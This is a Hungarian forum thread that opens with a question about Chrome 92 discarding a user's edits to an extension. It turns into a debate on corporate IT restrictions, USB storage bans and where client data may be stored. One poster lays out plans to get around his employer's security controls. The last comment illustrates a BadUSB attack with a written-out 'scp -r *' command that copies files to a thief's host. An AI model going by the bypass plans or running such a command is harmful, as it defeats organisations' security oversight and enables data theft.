Chrome frissites utan teljesen megvaltozik

Web, mail, IRC, IM, hálózatok

Üdv!

 

Frissítettem a chrome-omat 73-as verzióról 92-esre (92.0.4515.159-1, de minek?), és 1 kisebb, és egy nagyobb probléma is akadt.

 

1) A nagyobb probléma: Egyetlen egy extension-t használok, pár hónapja https://hup.hu/node/173541 itt keresgéltem, és egy copy all urls nevű extension-t használtam némileg a kódjában módosítva. A 92-es chrome ezt már valamiért nem hagyja, ha módosítom a forrásfájlt, a chrome ujraindításánál felülírja a módosításaimat, azokat eldobja. Hogyan tudom elérni, hogy a módosított változat maradjon véglegesen érvényben?

 

2) A böngészősávba írva eddig az eddig megtekintett URL-ek közül hozta az első találatokat, most viszont ha írok valamit, már a google search eredményeit jeleníti meg először, az eddig megnyitott URL-eket meg kb. a 6. hely környékétől. Ezt vissza lehet valahogy állítani? Ez a kevésbé fontos nyilván, csak idegesítő.

  • 705 megtekintés

( pirate | 2021. 08. 24., k – 09:25 )

Hogyan tudom elérni, hogy a módosított változat maradjon véglegesen érvényben?

Gondolom azert, ha valami malware/virus modosit egy Chrome kiterjesztest akkor az ne maradjon ott, szerintem ez jo dolog biztonsagi szempontbol.

Szerintem a 2. pont modosithato a beallitasokban, de nem 100%, sosem kerestem.

"Már nem csak tehetségekből, de a hülyékből is kifogytunk..."

Lehet, hogy jó dolog, de nagyon szeretném ezt megkerülni. Nem értek az extension-ökhöz, örülök, hogy ezt az egyet tudtam úgy módosítani, hogy nekem jó legyen az adott feladatra.

 

Ki lehet valahogy kapcsolni ezt az új biztonsági featuret? Avagy, próbáltam megkeresni az eredeti filet, amit másolgat, de nem találtam. Hol tudok erre rálelni, hogy ott tudjam módosítani (nyilván valami csomagban van)? Bár, gondolom nem ilyen egyszerű az egész.

Ja csak sokszor már a pokolból hozott tintával lehet csak aláírni, hogy megegye a rendszer.
Nem ismerem pontosan, hogy a Chrome extension-öknél hogy van, de Firefox-nál voltak már balhék.

Alapvetően a trendekkel van bajom. Az IT osztály fosik, és lekorlátoznak mindent. Már csak inkognitóban lehetek admin a laptopomon, local url filter van, így vpn-en kívül se lehet már sok dolgot elérni (,,nehogy a gémélről beszopja a paraszt a zsalolóvírust"). Eljutunk lassan oda, hogy csak repóból válogathatok programokat és mindenért sírni kell, hogy telepítsék fel? Nekem laptopot ígértek, nem tamagochi-t.
Eddig voltak azért kiskapuk a fejlesztőknek, power usereknek (külön wifi korlátozások nélkül pl. az Internet felé, vagy nemcéges telóra is tudtam kulcsot generálni az email eléréshez), amiket az egységsugarú úgysem ugrott meg. De ezek is szépen lassan szűnnek meg.
Support meg lófasz van. Nem egyszer fordult elő csak az elmúlt hetekben, hogy adatbáziskapcsolat problémám volt. Rájelentkeztek a gépemre, és ment a mismásolás a telefonban, fingjuk se volt, mi a gond. Végül mindig magam oldottam meg.

Aztán meg vannak lepődve, amikor a céges eszközt bebaszom a fiókba és dolgozom inkább a sajátomon, meg külső infrán tartom a cuccokat.

Szerintem nem ez lenne a normális. Ezt csak az IT managerek sujkolják. Persze Linuxot, HP-UX-ot nem lehetne ugye használni normális access controllal. Mert jaj a lobbi...

A PC egy general purpose cucc, nem egy tablet.
Ahhoz vagyok szokva, hogy megbíznak bennem. Az előző munkahelyemen a tűzfalon is admin voltam. Ha kellett, nyitottam-zártam egy portot, kikapcsoltam-bekapcsoltam egy filtert vagy írtam egy kivételt.

Az a use-case, hogy nem akarom megindokolni, mire miért van szükségem, nem akarom elmagyarázni a telefonban, hogyan telepítsék, amikor én magam is meg tudom csinálni. Valamint egyes dolgokhoz nagyon poor a support, mert a kijelölt kollégák se értenek hozzá igazán. És tudod azt sem szeretem, amikor azt mondják, hogy nem lehetne ezt inkább hétfő reggel?
Nem b+ én most szeretnék ezzel foglalkozni. Ha hétfő reggel szeretném, akkor hívtalak volna.

Most a mass storage tiltásán dolgoznak. Gondolom usb id alapján. Már előre kíváncsi vagyok, át tudom-e routolni a portot egy VirtualBox-ba, illetve akkor is működik-e majd a szűrőjük. Vagy hogy az SD slot kiskapu marad-e. Eljutunk lassan oda, hogy egy RPi kell a laptopom mellé, amivel egy tunnelen kommunikálok.
Azt persze nem tudják megoldani, hogy a mérőgépek (XP-vel, lol!) tartományba léphessenek (mondjuk ez lehet nem is baj) és elérjük az adatokat hálózaton. Marad a pendrive.

Be kell sandbox-olni, konténerezni, ami kockázatos. Nem megtiltani.

"Az előző munkahelyemen a tűzfalon is admin voltam. Ha kellett, nyitottam-zártam egy portot, kikapcsoltam-bekapcsoltam egy filtert vagy írtam egy kivételt." - mert megbíztak benned, miközben "Most a mass storage tiltásán dolgoznak. Gondolom usb id alapján. Már előre kíváncsi vagyok, át tudom-e routolni a portot egy VirtualBox-ba, illetve akkor is működik-e majd a szűrőjük. Vagy hogy az SD slot kiskapu marad-e. Eljutunk lassan oda, hogy egy RPi kell a laptopom mellé, amivel egy tunnelen kommunikálok." - úgy és akkor próbálod telibesz@rni a korlátozásokat/szabályokat, amikor és ahogy csak tudod... Értelmesebb helyen első körben egy fegyelmi, második körben meg útilapu lenne a "jutalma" az ilyen hozzáállásnak.

"nem akarom megindokolni, mire miért van szükségem" - Akkor ne csodálkozz, ha indoklás nélkül fogja az illetékes elkaszálni a kérésedet.

Az XP-s folyamatperifériák témaköre messzire vezet - hálózat nélkül/szeparáltan megfelelő kockázatelemzést és értelmezést követően nyugodtan maradhatnak -azokkal az üzemeltetési nehézségekkel, amit leírtál. Igen, ilyen eszközökről a teljes szeparáció okán egyszerűbb sneakernet-en elvinni az adatokat, mint mindet egymástól is(!) leválasztva egy dedikált mérőgépes/folymaatperiféria hálózatra felrakni, és ott megoldani azt, hogy egy átjárón keresztül a gépek tudjanak írni, az éles hálózat felől meg olvasni egy adott tárterületet.

 

Ne keverjük össze, ahol megbíztak bennem, az másik hely volt. Ott magam is együttműködő voltam.
Ahol viszont tesznek alám és korlátoznak befele ,,mert csak", segíteni meg nem tudnak, lepattintanak, ha kell valami, ott ne csodálkozzanak, hogy kialakul az emberben a védekezési reakció.

Szerintem el tudom dönteni, mire van szükségem a munkámhoz. Nem akarom ezt olyanoknak magyarázni, akiknek láthatóan fingja sincs az egészről és megoldás helyett elmagyarázzák, hogy nekem igazából nem erre van szükségem.Í
Van néhány rendes IT-s gyerek, akikkel lehet együttműködni és oda-vissza segítjük egymást. Csak ennek szerintem nem ilyen szinten kellene működnie.

Lehet persze elvekhez ragaszkodni, csak egyrészt ügyfél, beszállító meg más elvekhez ragaszkodik. Másrészt meg a 6000 Eurós számlát fáj aláírni, amikor kell egy másik ipari PC XP helyett Win10-zel, hogy tudjuk ugyanazt csinálni, mint eddig. XP helyett Win10-zel.

Amíg ez a hozzáállás, hogy oldd meg tesó ahogy tudod, addig megoldom, ahogy tudom.

Amit leírsz is jól mutatja, hogy az adekvát szakértelemmel igen, de önálló gondolatokkal még nem rendelkező csinovnyikokra van a legnagyobb igény.
Csak én meg nem ilyen vagyok. Ha valahova elköteleződöm, én egész emberként, teljes szélességgel odaállok és komolyan veszem a feladatomat és a célokat. Akkor is, ha közben ilyen kis félkülsős társosztályok akadályokat állítanak. (Mert hogy supportálnának a célok elérésében, azt kis jóindulattal sem tudom mondani.)

Valamiért az IT-sek körében nincs hagyománya (vagy csak a legritkább esetekben) a pont elég jó, de megfizethető megoldások megtalálásában. Csak csillióba kerülő rendszereket tudnak javasolni, azt hazudva, hogy máshogy nem lehet, és nagy számlákat benyújtani. Aztán fölényeskednek, hogy jah, hát a buta ügyfél az mit akar, az nem ért hozzá. Pedig gyakran éppen ők nem értik, mit szeretne valójában az ügyfél. Aki meg erre rá mer világítani, azt hű fegyelmi, hű ki kell rúgni! Nehogy még a végén kiderüljön az alkalmatlanságuk.
Sajnos én leginkább ilyenekkel találkozom.

Van azért kivétel is. Volt egy ügyfelünk, akinél nagyon szerettem lenni, szuper jó srácok dolgoztak ott. Szívből tisztelem őket, le a kalappal a tudásuk és a hozzáállásuk előtt. Csak sajnos nem ez az általános.

"Ha valahova elköteleződöm, én egész emberként, teljes szélességgel odaállok és komolyan veszem a feladatomat és a célokat. Akkor is, ha közben ilyen kis félkülsős társosztályok akadályokat állítanak."

A feladatodon ne akarj túlterjeszkedni. Abból soha nem sül ki semmi jó. Lehet, hogy nem azonnal, de vissza tud ütni, ha ilyen történt, mint ahogy az is, ha a szabályokat meghágod, ahelyett, hogy a megértésüket próbálnád elérni (miért van úgy), és ha szerinted nem jó, akkor -a nagy szakmai tudásoddal- adj javaslatot arra, hogy hogyan kéne megváltoztatni.

+1 a felettem lévőre + 

meg külső infrán tartom a cuccokat.

Ez igen csak kérdőjeles hozzállás... Ügyfél/munkáltató adatait sosem tartjuk külső infrán, kivéve ha kimondottan ezt megköveteli a szerződés. Minden más esetben ügyfél/munkáltató infráján történik a fejlesztés, tesztelés stb.

Plusz a felhasznált alkalmazások/technológiák sok helyen már csak azért is kötöttek, mert véges azok köre amit majd supportálni tud/akar a megrendelő. Vagy épp át tud adni más beszállítónak fejlesztésre. Nem véletlen vannak olyan helyeken ahol több beszállító is van, időnként rövid időre rotálva az alkalmazások fejlesztése az egyes beszállítók között, hogy lássák ki fejleszt olyan módon, h ne lehessen kiváltani őket bármikor. Ennek blockere lehet akár egyetlen alkalmazás is, akár licensz akár más okokból is.

Ügyfél/munkáltató adatait sosem tartjuk külső infrán

Ezzel még egyet is értek.
Csak amikor paranoiából elveszegetik a w jogomat könyvtárakról, és a más telephelyen dolgozó kollégával nem tudom megosztani az adatokat, vagy nem tudom olyan helyre tenni, amit kiküldetés alatt is normális sebességgel elérek, akkor valahogy ezeket a helyzeteket is meg lehet oldani.
A főnököm valagba is rúgna, ha ilyen indokokat hoznék fel, miért nem sikerült valami az ügyfélnél.

Egyébként nálunk érdekes dolog ez. Az egyik HR-es vezető pl. a corporate policy által kifejezetten tiltott platformot választott online tréningek megtartásához. Mert egy dolog a céges policy, és egy másik, hogy a trainer cég mivel kompatibilis.
Amikor rákérdeztem: ne pofázzak, mindenki oldja meg.

Az alkalmazások/technológiák kiválasztásánál nyilván figyelembe veszem, hogy a végső terméket ne érintse. Nem a beforduló library-t töltöm le arbitrary helyről...

Ja meg arról nem is beszélve, milyen kellemetlen, amikor az ügyféllel nem tudtok pendrive-on odaadni egymásnak valamit, mert bocs, de a gépemen le van tiltva a mass storage LOL.

Ja meg arról nem is beszélve, milyen kellemetlen, amikor az ügyféllel nem tudtok pendrive-on odaadni egymásnak valamit, mert bocs, de a gépemen le van tiltva a mass storage LOL.

Sosem adok ügyfélnek pendrive-on semmit. LOL Megfelelő fileshare-re feltöltve (amit akár az ügyfél is bíztosíthat) kap egy linket amin eléri, amit sok ügyfélnél a saját oldalukon megrég még egy vírus kergető is és ha valamit olyat talál akkor megy kézi vizsgálatra. És csak utánna kerül a célszemélyhez.

És ha az ügyfél ad valamit pendrive-on?
Németeknél el lehet játszani a blame it on the corporate rules kártyát, de ázsiaiaknál egy szint fölött nem annyira nyerő a puhafaszúság meg a bizalmatlanság. Mert ők ennek fogják venni, ha nem vagy hajlandó bedugni a gépedbe a szarukat.

Bár nem dolgoztam soha pentester munkakörben, az előző munkahelyemen elég erős kiképzést kaptam informatikai rendszerek biztonságából (már csak azért is, hogy az auditorokat hatékonyan tudjuk átbaszni), valmint tanultam social engineering-et is. Nem állítom, hogy engem aztán senki nem basz át, ez benne van a pakliban. De a kockázatokat úgy gondolom tudom értékelni.

Idegen pendrive most is virtualbox-ba routolt USB-re megy, ahol egy erre a célra fenntartott XP alól olvasom. Vannak benne lightweight programok (pl. SumatraPDF) dokumentumok olvasására. És csak visszalököm utána a snapshot-ra.
Tudom ez se véd meg mindentől, de nem dolgozhatsz kotonban. Van az a mértékű kockázat, amit néha be kell vállalni az üzlet érdekében.

Én is csak azt várom el, hogy legalább a saját munkáltatóm megbízzon bennem, amíg nem adok okot az ellenkezőjére.
Valamint hiszek abban, hogy ha felelősséget adsz az emberek kezébe, a többség fel fog nőni a feladathoz. Mert tudja, érzi, hogy múlik rajta.
Ennél jobb védelem szerintem nincs.

És ha az ügyfél ad valamit pendrive-on?

Nem ad semmit pendrive-on. Minden szerződésbe van foglalva, még az is, honnan hova és hogyan közlekednek adatok. Ha közlekednek és nem a belső infrájukon kel dolgozni. A bíztonságot figyelmen kívűl hagyva is mekkora macera már egy pendrive egy távoli eléréssel szemben. Eleve vagy közel kel lenni egymáshoz, vagy idő mire leér a célhelyre.

Nektek akkor nagyon jó. Ázsiában ez nem így megy.

Egyébként nem arról beszéltem, hogy pendrive-on küldünk le valamit. Az szerintem is nemcsak hogy insecure, de baromság is.
Hanem arról, amikor egy f2f meetingen ügyfél vagy beszállító ad egy pendrive-ot. Akár csak egy Excel kimutatást akar megmutatni a csóka a problémáikkal amit direkt Neked készített, bármi lehet.

Kategorikusan a mass storage tiltásával van bajom. Úgy kellene ezt szerintem csinálni, hogy van egy kiskapu, amit a power user megugrik, a könyvelő kislány meg nem.

De, Marikától is félteni kell az adatokat. Nem azért, mert tönkre akarja tenni, el akarja lopni, hanem azért, mert ha bedughat egy pendrájvot, akkor be is fog dugni. Utána meg jön az, hogy csak megnéztem a kiscicia.pdf-et, kérdezett valamit, leokéztam és most nem megy. És ez a jobbik eset, mert van, hogy a kérdezett valamit leokéztam megemlítése elmarad. Sőt, a bedugott penről se biztos hogy szólni fog.

egy f2f meetingen ügyfél vagy beszállító ad egy pendrive-ot

Elkuldheti email-ben (titkositva ha szukseges).

Jo a pendrive sokszor, de ha tudod, hogy tiltva van a hasznalata "fizikailag" (is) akkor:

1. kozlod az ugyfellel, hogy nem vagy hajlando semmit elfogadni pendrive-on

2. melohelyet valtasz :)

"Már nem csak tehetségekből, de a hülyékből is kifogytunk..."

Az nagyon helyes, ha az ügyféllel nem adakoztok semmit egymásnak pendrive-on, na az végképp az a műfaj, ami csak önszopatásra, meg virnyákbeszívásra jó. Majd küldi e-mailben, vagy feltölti valami megosztóoldalra, és ad linket. Idegen pendrive-ot nem jó ötlet a gépbe dugdosni.

Ez tiltott platform nem hangzik jól, nem tudom mit takar. Én szerződést bontanék a trainer cégnek, és oldják meg akkor ők, ha akarnak megrendelést. Sajnos elég sok cég van, amik még mindig használnak ilyen 100 évvel ezelőtt megrendelésre készített, anno még XP-re, meg IE6 ActiveX-re vagy Java6-ra írogatott szutykokat, és már annyira mélyen vannak a gányolásban, hogy pajszerral se tudod lefeszíteni őket róla.

Ügyféladatokat meg nyugodtan lehet bárhol tartani, csak rendesen legyen titkosítva. Nem egy nagy művészet ma már, főleg, hogy minden modern proci tartalmazza az AES utasításkiterjesztést jó 10 éve, lényegében így a titkosítás overheadje szinte teljesen eltűnik. Titkosítás nélkül még belső infrastrutúrán sem jó tartani semmit.

Windows 95/98: 32 bit extension and a graphical shell for a 16 bit patch to an 8 bit operating system originally coded for a 4 bit microprocessor, written by a 2 bit company that can't stand 1 bit of competition.”

Én szerződést bontanék a trainer cégnek, és oldják meg akkor ők, ha akarnak megrendelést.

Nincs szükség a tréningre, miután felbontottátok a szerződést? Mennyi idő alatt lesz új vendor? Mennyivel fog többe kerülni? Mennyi a kötbér az idő előtti szerződésbontásért? Mennyivel lesz jobb az új cég platformja? Tudják-e ugyanazt a minőséget hozni? Stb.

Ügyféladatokat meg nyugodtan lehet bárhol tartani, csak rendesen legyen titkosítva.

Elhagyhatja-e az ügyféladat az ország területét? És az EU-ét? Korlátozva van-e az adatkezelők köre? És az adatfeldolgozóké? Kell-e gondoskodni az adatok megsemmisítéséről valamilyen feltétel szerint? Kell-e címkézni az adatot? Előfordulhat-e wall crossing, és ha igen, mi a menete? Kell-e követni, ki, mikor fért hozzá az adatokhoz? Stb. (Ne értsd félre, a titkosítás jó és szükséges dolog.)

Ha titkosítva van, kit érdekel. Az olyan, mintha ott sem lenne az adat.

Ez nem egészen így van. Volt olyan ügyfél aki ezért nem költöztethette cloud szolgáltatóhoz az adatait és alkalmazásiat, mert nem volt egyiknek sem itthon DC-je. Sokszor nem azért nem hagyhatja el az EU területét vagy épp az országét, mert mivan ha ellopják, hanem mert vannak akikre kicsit több szabályozás vonatkozik mint egy átlag KKV-ra mondjuk.

Ezt a fizikailag hol van az adat dolgot picit mindig erőltetettnek éreztem. Az Internetben nem pont az a jó, hogy nem a fizikai síkon létezik?

Ha én szolgáltató lennék, felárral kiszámláznám az ilyen különleges kéréseket. Ha bulk áron kell, akor meg leszarnám ezeket a nyomorokat. Bemutatnám a papírt, hogy igen, van ott DC-m, aztán végül oda kerülne, ahol nekem olcsóbb. Nem lepődnék meg, ha ez nem nekem jutott volna először eszembe. Másrészt kezd már olyan átláthatatlan lenni a sok absztrakció, hogy talán már maguk a szolgáltatók sem tudják, melyik adat éppen hol van. Kicsit már Schrödinger macskája.

Ha én szolgáltató lennék, felárral kiszámláznám az ilyen különleges kéréseket.

Még szerencse, hogy igen sok esetben te választhatod meg melyik DC-be kéred épp az erőforrásokat. Nem véletlen, és nem csak a fenti példa miatt. Igen, van, hogy ez feláras móka (bár eddig 1-2 esetet kivéve csak akkor futottam ebbe bele, ha épp a "határain" járt az adott DC vagy épp annyira új volt), de ha erre van szükség, erre van szükség, bele kell kalkulálni a költségekbe tervezésnél.

Ha titkosítva van, kit érdekel. Az olyan, mintha ott sem lenne az adat.

Az, hogy titkosítva van az adat, az annyit jelent, hogy a ma publikusan ismert matematikai algoritmusokkal és a ma elérhető hardverrel a következő tíz/húsz/száz év alatt nem lehet visszafejteni. Viszont ne feledjük, hogy a cloud szolgáltató a világ végéig megőrizheti a titkosított adatunkat, és ha x év múlva majd lesz rá algoritmusa vagy erőforrása, akkor majd vissza tudja fejteni. Vannak olyan ügyfelek, akik ennyit sem szeretnek kockáztatni.

A jövőt ugyan előre sosem ismerhetjük, szerintem nagyjából skálázható, milyen titkosítást nem fognak megtörni akár száz évig sem.
Rádobok egy kaszkád kriptót, nem fogják azt piszkálni. Maga az adat nem ér annyit mint amennyit rá kellene fordítani. Száz év múlva meg mégannyit se fog érni.

Most se nagyon lehet csak úgy brahiból törögetni a 80-as 90-es években rendesen titkosított archívokat.

vagy feltölti valami megosztóoldalra

Ez is kerülendő, csak is saját sharing akár szállítói akár megrendelői oldalon...

Ügyféladatokat meg nyugodtan lehet bárhol tartani, csak rendesen legyen titkosítva.

Messze nem csak ennyiből áll az ügyféladat tárolás. Olvasd feljebb: https://hup.hu/comment/2665186#comment-2665186

Az ilyen eseteknél ahelyett, hogy megkerülni próbálnád egyből, jelezni kéne a problémát, hogy tudják, hogy megoldandó feladat van, mert ilyen use-case is van, meg kell oldani. És ha jelezted, és leszarták, akkor a főnök hiába akarna kirúgni ilyen indok mellett, szóltál, nem oldották meg, ennyi. Ha nem oldják meg, az első előforduló éles helyzet után meglesz a megoldás (akár egyéni kivétel formájában, ha tényleg annyira egyedi a problémád, akár standard módon).

IT: Ha kell prendrive, lehet igényelni. (Gondolom whitelist-elik az id-t.)
Csakhogy: titkosítottan fog csak menni (valami otfe megoldás lehet), amit a corporate gépeken fent lévő program kezel.
Ezzel sajnos pont ugyanannyira megyek. Corporate géppel más módon is tudok adatot cserélni.

Nekem ez nem fér bele, hogy ügyfélnél, éles helyzetben bénázzak, csak hogy precedenst teremtsek. A pofámat én ilyenhez nem adom.

Nagyon elszomorít, amerre megy ez az egész. Remélem egyszer felébredünk ebből a rémálomból.
Lehetne pl. konténerezni, sandbox-olni anélkül, hogy az egész rendszert korlátoznák.

Igazából nem is a mass storage amitől rettegni kell, hanem úgy általában az egész USB portot ki kellene önteni műgyantával :)

Mi van, ha valaki egy célhardwert készít, ami USB keyboard-nak adja ki magát, és csatlakozás után küldi a billentyűparancsokat, amivel indít egy terminált, abban háttérben elindít egy scp -r * thief@datastore.chinanet.ch parancsot, és bezárja a terminált. Ha elég gyors, csak azt látod, hogy felvillant valami. Ha elég ügyes, akkor rak mellé egy mass storage-ot is, hogy ne gyanakodjál.